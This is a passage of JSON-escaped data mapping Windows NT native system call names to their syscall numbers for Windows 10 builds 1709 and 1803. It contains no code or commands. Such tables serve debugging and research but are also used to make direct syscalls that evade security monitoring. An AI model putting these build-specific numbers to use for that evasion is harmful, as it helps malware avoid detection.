\"NtSetInformationTransactionManager\": \"400\", \"NtSetInformationVirtualMemory\": \"401\", \"NtSetInformationWorkerFactory\": \"402\", \"NtSetIntervalProfile\": \"403\", \"NtSetIoCompletion\": \"404\", \"NtSetIoCompletionEx\": \"405\", \"NtSetLdtEntries\": \"406\", \"NtSetLowEventPair\": \"407\", \"NtSetLowWaitHighEventPair\": \"408\", \"NtSetQuotaInformationFile\": \"409\", \"NtSetSecurityObject\": \"410\", \"NtSetSystemEnvironmentValue\": \"411\", \"NtSetSystemEnvironmentValueEx\": \"412\", \"NtSetSystemInformation\": \"413\", \"NtSetSystemPowerState\": \"414\", \"NtSetSystemTime\": \"415\", \"NtSetThreadExecutionState\": \"416\", \"NtSetTimer2\": \"417\", \"NtSetTimerEx\": \"418\", \"NtSetTimerResolution\": \"419\", \"NtSetUuidSeed\": \"420\", \"NtSetVolumeInformationFile\": \"421\", \"NtSetWnfProcessNotificationEvent\": \"422\", \"NtShutdownSystem\": \"423\", \"NtShutdownWorkerFactory\": \"424\", \"NtSignalAndWaitForSingleObject\": \"425\", \"NtSinglePhaseReject\": \"426\", \"NtStartProfile\": \"427\", \"NtStopProfile\": \"428\", \"NtSubscribeWnfStateChange\": \"429\", \"NtSuspendProcess\": \"430\", \"NtSuspendThread\": \"431\", \"NtSystemDebugControl\": \"432\", \"NtTerminateJobObject\": \"433\", \"NtTestAlert\": \"434\", \"NtThawRegistry\": \"435\", \"NtThawTransactions\": \"436\", \"NtTraceControl\": \"437\", \"NtTranslateFilePath\": \"438\", \"NtUmsThreadYield\": \"439\", \"NtUnloadDriver\": \"440\", \"NtUnloadKey\": \"441\", \"NtUnloadKey2\": \"442\", \"NtUnloadKeyEx\": \"443\", \"NtUnlockFile\": \"444\", \"NtUnlockVirtualMemory\": \"445\", \"NtUnmapViewOfSectionEx\": \"446\", \"NtUnsubscribeWnfStateChange\": \"447\", \"NtUpdateWnfStateData\": \"448\", \"NtVdmControl\": \"449\", \"NtWaitForAlertByThreadId\": \"450\", \"NtWaitForDebugEvent\": \"451\", \"NtWaitForKeyedEvent\": \"452\", \"NtWaitForWorkViaWorkerFactory\": \"453\", \"NtWaitHighEventPair\": \"454\", \"NtWaitLowEventPair\": \"455\"}, \"1709\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAlpcAcceptConnectPort\": \"116\", \"NtAlpcCancelMessage\": \"117\", \"NtAlpcConnectPort\": \"118\", \"NtAlpcConnectPortEx\": \"119\", \"NtAlpcCreatePort\": \"120\", \"NtAlpcCreatePortSection\": \"121\", \"NtAlpcCreateResourceReserve\": \"122\", \"NtAlpcCreateSectionView\": \"123\", \"NtAlpcCreateSecurityContext\": \"124\", \"NtAlpcDeletePortSection\": \"125\", \"NtAlpcDeleteResourceReserve\": \"126\", \"NtAlpcDeleteSectionView\": \"127\", \"NtAlpcDeleteSecurityContext\": \"128\", \"NtAlpcDisconnectPort\": \"129\", \"NtAlpcImpersonateClientContainerOfPort\": \"130\", \"NtAlpcImpersonateClientOfPort\": \"131\", \"NtAlpcOpenSenderProcess\": \"132\", \"NtAlpcOpenSenderThread\": \"133\", \"NtAlpcQueryInformation\": \"134\", \"NtAlpcQueryInformationMessage\": \"135\", \"NtAlpcRevokeSecurityContext\": \"136\", \"NtAlpcSendWaitReceivePort\": \"137\", \"NtAlpcSetInformation\": \"138\", \"NtAreMappedFilesTheSame\": \"139\", \"NtAssignProcessToJobObject\": \"140\", \"NtAssociateWaitCompletionPacket\": \"141\", \"NtCallEnclave\": \"142\", \"NtCancelIoFileEx\": \"143\", \"NtCancelSynchronousIoFile\": \"144\", \"NtCancelTimer2\": \"145\", \"NtCancelWaitCompletionPacket\": \"146\", \"NtCommitComplete\": \"147\", \"NtCommitEnlistment\": \"148\", \"NtCommitRegistryTransaction\": \"149\", \"NtCommitTransaction\": \"150\", \"NtCompactKeys\": \"151\", \"NtCompareObjects\": \"152\", \"NtCompareSigningLevels\": \"153\", \"NtCompareTokens\": \"154\", \"NtCompleteConnectPort\": \"155\", \"NtCompressKey\": \"156\", \"NtConnectPort\": \"157\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"158\", \"NtCreateDebugObject\": \"159\", \"NtCreateDirectoryObject\": \"160\", \"NtCreateDirectoryObjectEx\": \"161\", \"NtCreateEnclave\": \"162\", \"NtCreateEnlistment\": \"163\", \"NtCreateEventPair\": \"164\", \"NtCreateIRTimer\": \"165\", \"NtCreateIoCompletion\": \"166\", \"NtCreateJobObject\": \"167\", \"NtCreateJobSet\": \"168\", \"NtCreateKeyTransacted\": \"169\", \"NtCreateKeyedEvent\": \"170\", \"NtCreateLowBoxToken\": \"171\", \"NtCreateMailslotFile\": \"172\", \"NtCreateMutant\": \"173\", \"NtCreateNamedPipeFile\": \"174\", \"NtCreatePagingFile\": \"175\", \"NtCreatePartition\": \"176\", \"NtCreatePort\": \"177\", \"NtCreatePrivateNamespace\": \"178\", \"NtCreateProcess\": \"179\", \"NtCreateProfile\": \"180\", \"NtCreateProfileEx\": \"181\", \"NtCreateRegistryTransaction\": \"182\", \"NtCreateResourceManager\": \"183\", \"NtCreateSemaphore\": \"184\", \"NtCreateSymbolicLinkObject\": \"185\", \"NtCreateThreadEx\": \"186\", \"NtCreateTimer\": \"187\", \"NtCreateTimer2\": \"188\", \"NtCreateToken\": \"189\", \"NtCreateTokenEx\": \"190\", \"NtCreateTransaction\": \"191\", \"NtCreateTransactionManager\": \"192\", \"NtCreateUserProcess\": \"193\", \"NtCreateWaitCompletionPacket\": \"194\", \"NtCreateWaitablePort\": \"195\", \"NtCreateWnfStateName\": \"196\", \"NtCreateWorkerFactory\": \"197\", \"NtDebugActiveProcess\": \"198\", \"NtDebugContinue\": \"199\", \"NtDeleteAtom\": \"200\", \"NtDeleteBootEntry\": \"201\", \"NtDeleteDriverEntry\": \"202\", \"NtDeleteFile\": \"203\", \"NtDeleteKey\": \"204\", \"NtDeleteObjectAuditAlarm\": \"205\", \"NtDeletePrivateNamespace\": \"206\", \"NtDeleteValueKey\": \"207\", \"NtDeleteWnfStateData\": \"208\", \"NtDeleteWnfStateName\": \"209\", \"NtDisableLastKnownGood\": \"210\", \"NtDisplayString\": \"211\", \"NtDrawText\": \"212\", \"NtEnableLastKnownGood\": \"213\", \"NtEnumerateBootEntries\": \"214\", \"NtEnumerateDriverEntries\": \"215\", \"NtEnumerateSystemEnvironmentValuesEx\": \"216\", \"NtEnumerateTransactionObject\": \"217\", \"NtExtendSection\": \"218\", \"NtFilterBootOption\": \"219\", \"NtFilterToken\": \"220\", \"NtFilterTokenEx\": \"221\", \"NtFlushBuffersFileEx\": \"222\", \"NtFlushInstallUILanguage\": \"223\", \"NtFlushInstructionCache\": \"224\", \"NtFlushKey\": \"225\", \"NtFlushProcessWriteBuffers\": \"226\", \"NtFlushVirtualMemory\": \"227\", \"NtFlushWriteBuffer\": \"228\", \"NtFreeUserPhysicalPages\": \"229\", \"NtFreezeRegistry\": \"230\", \"NtFreezeTransactions\": \"231\", \"NtGetCachedSigningLevel\": \"232\", \"NtGetCompleteWnfStateSubscription\": \"233\", \"NtGetContextThread\": \"234\", \"NtGetCurrentProcessorNumber\": \"235\", \"NtGetCurrentProcessorNumberEx\": \"236\", \"NtGetDevicePowerState\": \"237\", \"NtGetMUIRegistryInfo\": \"238\", \"NtGetNextProcess\": \"239\", \"NtGetNextThread\": \"240\", \"NtGetNlsSectionPtr\": \"241\", \"NtGetNotificationResourceManager\": \"242\", \"NtGetWriteWatch\": \"243\", \"NtImpersonateAnonymousToken\": \"244\", \"NtImpersonateThread\": \"245\", \"NtInitializeEnclave\": \"246\", \"NtInitializeNlsFiles\": \"247\", \"NtInitializeRegistry\": \"248\", \"NtInitiatePowerAction\": \"249\", \"NtIsSystemResumeAutomatic\": \"250\", \"NtIsUILanguageComitted\": \"251\", \"NtListenPort\": \"252\", \"NtLoadDriver\": \"253\", \"NtLoadEnclaveData\": \"254\", \"NtLoadHotPatch\": \"255\", \"NtLoadKey\": \"256\", \"NtLoadKey2\": \"257\", \"NtLoadKeyEx\": \"258\", \"NtLockFile\": \"259\", \"NtLockProductActivationKeys\": \"260\", \"NtLockRegistryKey\": \"261\", \"NtLockVirtualMemory\": \"262\", \"NtMakePermanentObject\": \"263\", \"NtMakeTemporaryObject\": \"264\", \"NtManagePartition\": \"265\", \"NtMapCMFModule\": \"266\", \"NtMapUserPhysicalPages\": \"267\", \"NtModifyBootEntry\": \"268\", \"NtModifyDriverEntry\": \"269\", \"NtNotifyChangeDirectoryFile\": \"270\", \"NtNotifyChangeDirectoryFileEx\": \"271\", \"NtNotifyChangeKey\": \"272\", \"NtNotifyChangeMultipleKeys\": \"273\", \"NtNotifyChangeSession\": \"274\", \"NtOpenEnlistment\": \"275\", \"NtOpenEventPair\": \"276\", \"NtOpenIoCompletion\": \"277\", \"NtOpenJobObject\": \"278\", \"NtOpenKeyEx\": \"279\", \"NtOpenKeyTransacted\": \"280\", \"NtOpenKeyTransactedEx\": \"281\", \"NtOpenKeyedEvent\": \"282\", \"NtOpenMutant\": \"283\", \"NtOpenObjectAuditAlarm\": \"284\", \"NtOpenPartition\": \"285\", \"NtOpenPrivateNamespace\": \"286\", \"NtOpenProcessToken\": \"287\", \"NtOpenRegistryTransaction\": \"288\", \"NtOpenResourceManager\": \"289\", \"NtOpenSemaphore\": \"290\", \"NtOpenSession\": \"291\", \"NtOpenSymbolicLinkObject\": \"292\", \"NtOpenThread\": \"293\", \"NtOpenTimer\": \"294\", \"NtOpenTransaction\": \"295\", \"NtOpenTransactionManager\": \"296\", \"NtPlugPlayControl\": \"297\", \"NtPrePrepareComplete\": \"298\", \"NtPrePrepareEnlistment\": \"299\", \"NtPrepareComplete\": \"300\", \"NtPrepareEnlistment\": \"301\", \"NtPrivilegeCheck\": \"302\", \"NtPrivilegeObjectAuditAlarm\": \"303\", \"NtPrivilegedServiceAuditAlarm\": \"304\", \"NtPropagationComplete\": \"305\", \"NtPropagationFailed\": \"306\", \"NtPulseEvent\": \"307\", \"NtQueryAuxiliaryCounterFrequency\": \"308\", \"NtQueryBootEntryOrder\": \"309\", \"NtQueryBootOptions\": \"310\", \"NtQueryDebugFilterState\": \"311\", \"NtQueryDirectoryFileEx\": \"312\", \"NtQueryDirectoryObject\": \"313\", \"NtQueryDriverEntryOrder\": \"314\", \"NtQueryEaFile\": \"315\", \"NtQueryFullAttributesFile\": \"316\", \"NtQueryInformationAtom\": \"317\", \"NtQueryInformationByName\": \"318\", \"NtQueryInformationEnlistment\": \"319\", \"NtQueryInformationJobObject\": \"320\", \"NtQueryInformationPort\": \"321\", \"NtQueryInformationResourceManager\": \"322\", \"NtQueryInformationTransaction\": \"323\", \"NtQueryInformationTransactionManager\": \"324\", \"NtQueryInformationWorkerFactory\": \"325\", \"NtQueryInstallUILanguage\": \"326\", \"NtQueryIntervalProfile\": \"327\", \"NtQueryIoCompletion\": \"328\", \"NtQueryLicenseValue\": \"329\", \"NtQueryMultipleValueKey\": \"330\", \"NtQueryMutant\": \"331\", \"NtQueryOpenSubKeys\": \"332\", \"NtQueryOpenSubKeysEx\": \"333\", \"NtQueryPortInformationProcess\": \"334\", \"NtQueryQuotaInformationFile\": \"335\", \"NtQuerySecurityAttributesToken\": \"336\", \"NtQuerySecurityObject\": \"337\", \"NtQuerySecurityPolicy\": \"338\", \"NtQuerySemaphore\": \"339\", \"NtQuerySymbolicLinkObject\": \"340\", \"NtQuerySystemEnvironmentValue\": \"341\", \"NtQuerySystemEnvironmentValueEx\": \"342\", \"NtQuerySystemInformationEx\": \"343\", \"NtQueryTimerResolution\": \"344\", \"NtQueryWnfStateData\": \"345\", \"NtQueryWnfStateNameInformation\": \"346\", \"NtQueueApcThreadEx\": \"347\", \"NtRaiseException\": \"348\", \"NtRaiseHardError\": \"349\", \"NtReadOnlyEnlistment\": \"350\", \"NtRecoverEnlistment\": \"351\", \"NtRecoverResourceManager\": \"352\", \"NtRecoverTransactionManager\": \"353\", \"NtRegisterProtocolAddressInformation\": \"354\", \"NtRegisterThreadTerminatePort\": \"355\", \"NtReleaseKeyedEvent\": \"356\", \"NtReleaseWorkerFactoryWorker\": \"357\", \"NtRemoveIoCompletionEx\": \"358\", \"NtRemoveProcessDebug\": \"359\", \"NtRenameKey\": \"360\", \"NtRenameTransactionManager\": \"361\", \"NtReplaceKey\": \"362\", \"NtReplacePartitionUnit\": \"363\", \"NtReplyWaitReplyPort\": \"364\", \"NtRequestPort\": \"365\", \"NtResetEvent\": \"366\", \"NtResetWriteWatch\": \"367\", \"NtRestoreKey\": \"368\", \"NtResumeProcess\": \"369\", \"NtRevertContainerImpersonation\": \"370\", \"NtRollbackComplete\": \"371\", \"NtRollbackEnlistment\": \"372\", \"NtRollbackRegistryTransaction\": \"373\", \"NtRollbackTransaction\": \"374\", \"NtRollforwardTransactionManager\": \"375\", \"NtSaveKey\": \"376\", \"NtSaveKeyEx\": \"377\", \"NtSaveMergedKeys\": \"378\", \"NtSecureConnectPort\": \"379\", \"NtSerializeBoot\": \"380\", \"NtSetBootEntryOrder\": \"381\", \"NtSetBootOptions\": \"382\", \"NtSetCachedSigningLevel\": \"383\", \"NtSetCachedSigningLevel2\": \"384\", \"NtSetContextThread\": \"385\", \"NtSetDebugFilterState\": \"386\", \"NtSetDefaultHardErrorPort\": \"387\", \"NtSetDefaultLocale\": \"388\", \"NtSetDefaultUILanguage\": \"389\", \"NtSetDriverEntryOrder\": \"390\", \"NtSetEaFile\": \"391\", \"NtSetHighEventPair\": \"392\", \"NtSetHighWaitLowEventPair\": \"393\", \"NtSetIRTimer\": \"394\", \"NtSetInformationDebugObject\": \"395\", \"NtSetInformationEnlistment\": \"396\", \"NtSetInformationJobObject\": \"397\", \"NtSetInformationKey\": \"398\", \"NtSetInformationResourceManager\": \"399\", \"NtSetInformationSymbolicLink\": \"400\", \"NtSetInformationToken\": \"401\", \"NtSetInformationTransaction\": \"402\", \"NtSetInformationTransactionManager\": \"403\", \"NtSetInformationVirtualMemory\": \"404\", \"NtSetInformationWorkerFactory\": \"405\", \"NtSetIntervalProfile\": \"406\", \"NtSetIoCompletion\": \"407\", \"NtSetIoCompletionEx\": \"408\", \"NtSetLdtEntries\": \"409\", \"NtSetLowEventPair\": \"410\", \"NtSetLowWaitHighEventPair\": \"411\", \"NtSetQuotaInformationFile\": \"412\", \"NtSetSecurityObject\": \"413\", \"NtSetSystemEnvironmentValue\": \"414\", \"NtSetSystemEnvironmentValueEx\": \"415\", \"NtSetSystemInformation\": \"416\", \"NtSetSystemPowerState\": \"417\", \"NtSetSystemTime\": \"418\", \"NtSetThreadExecutionState\": \"419\", \"NtSetTimer2\": \"420\", \"NtSetTimerEx\": \"421\", \"NtSetTimerResolution\": \"422\", \"NtSetUuidSeed\": \"423\", \"NtSetVolumeInformationFile\": \"424\", \"NtSetWnfProcessNotificationEvent\": \"425\", \"NtShutdownSystem\": \"426\", \"NtShutdownWorkerFactory\": \"427\", \"NtSignalAndWaitForSingleObject\": \"428\", \"NtSinglePhaseReject\": \"429\", \"NtStartProfile\": \"430\", \"NtStopProfile\": \"431\", \"NtSubscribeWnfStateChange\": \"432\", \"NtSuspendProcess\": \"433\", \"NtSuspendThread\": \"434\", \"NtSystemDebugControl\": \"435\", \"NtTerminateEnclave\": \"436\", \"NtTerminateJobObject\": \"437\", \"NtTestAlert\": \"438\", \"NtThawRegistry\": \"439\", \"NtThawTransactions\": \"440\", \"NtTraceControl\": \"441\", \"NtTranslateFilePath\": \"442\", \"NtUmsThreadYield\": \"443\", \"NtUnloadDriver\": \"444\", \"NtUnloadKey\": \"445\", \"NtUnloadKey2\": \"446\", \"NtUnloadKeyEx\": \"447\", \"NtUnlockFile\": \"448\", \"NtUnlockVirtualMemory\": \"449\", \"NtUnmapViewOfSectionEx\": \"450\", \"NtUnsubscribeWnfStateChange\": \"451\", \"NtUpdateWnfStateData\": \"452\", \"NtVdmControl\": \"453\", \"NtWaitForAlertByThreadId\": \"454\", \"NtWaitForDebugEvent\": \"455\", \"NtWaitForKeyedEvent\": \"456\", \"NtWaitForWorkViaWorkerFactory\": \"457\", \"NtWaitHighEventPair\": \"458\", \"NtWaitLowEventPair\": \"459\"}, \"1803\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAllocateVirtualMemoryEx\": \"116\", \"NtAlpcAcceptConnectPort\": \"117\", \"NtAlpcCancelMessage\": \"118\", \"NtAlpcConnectPort\": \"119\", \"NtAlpcConnectPortEx\": \"120\", \"NtAlpcCreatePort\": \"121\", \"NtAlpcCreatePortSection\": \"122\", \"NtAlpcCreateResourceReserve\": \"123\", \"NtAlpcCreateSectionView\": \"124\", \"NtAlpcCreateSecurityContext\": \"125\", \"NtAlpcDeletePortSection\": \"126\", \"NtAlpcDeleteResourceReserve\": \"127\", \"NtAlpcDeleteSectionView\": \"128\", \"NtAlpcDeleteSecurityContext\": \"129\", \"NtAlpcDisconnectPort\": \"130\", \"NtAlpcImpersonateClientContainerOfPort\": \"131\", \"NtAlpcImpersonateClientOfPort\": \"132\", \"NtAlpcOpenSenderProcess\": \"133\", \"NtAlpcOpenSenderThread\": \"134\", \"NtAlpcQueryInformation\": \"135\", \"NtAlpcQueryInformationMessage\": \"136\", \"NtAlpcRevokeSecurityContext\": \"137\", \"NtAlpcSendWaitReceivePort\": \"138\", \"NtAlpcSetInformation\": \"139\", \"NtAreMappedFilesTheSame\": \"140\", \"NtAssignProcessToJobObject\": \"141\", \"NtAssociateWaitCompletionPacket\": \"142\", \"NtCallEnclave\": \"143\", \"NtCancelIoFileEx\": \"144\", \"NtCancelSynchronousIoFile\": \"145\", \"NtCancelTimer2\": \"146\", \"NtCancelWaitCompletionPacket\": \"147\", \"NtCommitComplete\": \"148\", \"NtCommitEnlistment\": \"149\", \"NtCommitRegistryTransaction\": \"150\", \"NtCommitTransaction\": \"151\", \"NtCompactKeys\": \"152\", \"NtCompareObjects\": \"153\", \"NtCompareSigningLevels\": \"154\", \"NtCompareTokens\": \"155\", \"NtCompleteConnectPort\": \"156\", \"NtCompressKey\": \"157\", \"NtConnectPort\": \"158\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"159\", \"NtCreateDebugObject\": \"160\", \"NtCreateDirectoryObject\": \"161\", \"NtCreateDirectoryObjectEx\": \"162\", \"NtCreateEnclave\": \"163\", \"NtCreateEnlistment\": \"164\", \"NtCreateEventPair\": \"165\", \"NtCreateIRTimer\": \"166\", \"NtCreateIoCompletion\": \"167\", \"NtCreateJobObject\": \"168\", \"NtCreateJobSet\": \"169\", \"NtCreateKeyTransacted\": \"170\", \"NtCreateKeyedEvent\": \"171\", \"NtCreateLowBoxToken\": \"172\", \"NtCreateMailslotFile\": \"173\", \"NtCreateMutant\": \"174\", \"NtCreateNamedPipeFile\": \"175\", \"NtCreatePagingFile\": \"176\", \"NtCreatePartition\": \"177\", \"NtCreatePort\": \"178\", \"NtCreatePrivateNamespace\": \"179\", \"NtCreateProcess\": \"180\", \"NtCreateProfile\": \"181\", \"NtCreateProfileEx\": \"182\", \"NtCreateRegistryTransaction\": \"183\", \"NtCreateResourceManager\": \"184\", \"NtCreateSemaphore\": \"185\", \"NtCreateSymbolicLinkObject\": \"186\", \"NtCreateThreadEx\": \"187\", \"NtCreateTimer\": \"188\", \"NtCreateTimer2\": \"189\", \"NtCreateToken\": \"190\", \"NtCreateTokenEx\": \"191\", \"NtCreateTransaction\": \"192\", \"NtCreateTransactionManager\": \"193\", \"NtCreateUserProcess\": \"194\", \"NtCreateWaitCompletionPacket\": \"195\", \"NtCreateWaitablePort\": \"196\", \"NtCreateWnfStateName\": \"197\", \"NtCreateWorkerFactory\": \"198\", \"NtDebugActiveProcess\": \"199\", \"NtDebugContinue\": \"200\", \"NtDeleteAtom\": \"201\", \"NtDeleteBootEntry\": \"202\", \"NtDeleteDriverEntry\": \"203\", \"NtDeleteFile\": \"204\", \"NtDeleteKey\": \"205\", \"NtDeleteObjectAuditAlarm\": \"206\", \"NtDeletePrivateNamespace\": \"207\", \"NtDeleteValueKey\": \"208\", \"NtDeleteWnfStateData\": \"209\", \"NtDeleteWnfStateName\": \"210\", \"NtDisableLastKnownGood\": \"211\", \"NtDisplayString\": \"212\", \"NtDrawText\": \"213\", \"NtEnableLastKnownGood\": \"214\", \"NtEnumerateBootEntries\": \"215\", \"NtEnumerateDriverEntries\": \"216\", \"NtEnumerateSystemEnvironmentValuesEx\": \"217\", \"NtEnumerateTransactionObject\": \"218\", \"NtExtendSection\": \"219\", \"NtFilterBootOption\": \"220\", \"NtFilterToken\": \"221\", \"NtFilterTokenEx\": \"222\", \"NtFlushBuffersFileEx\": \"223\", \"NtFlushInstallUILanguage\": \"224\", \"NtFlushInstructionCache\": \"225\", \"NtFlushKey\": \"226\", 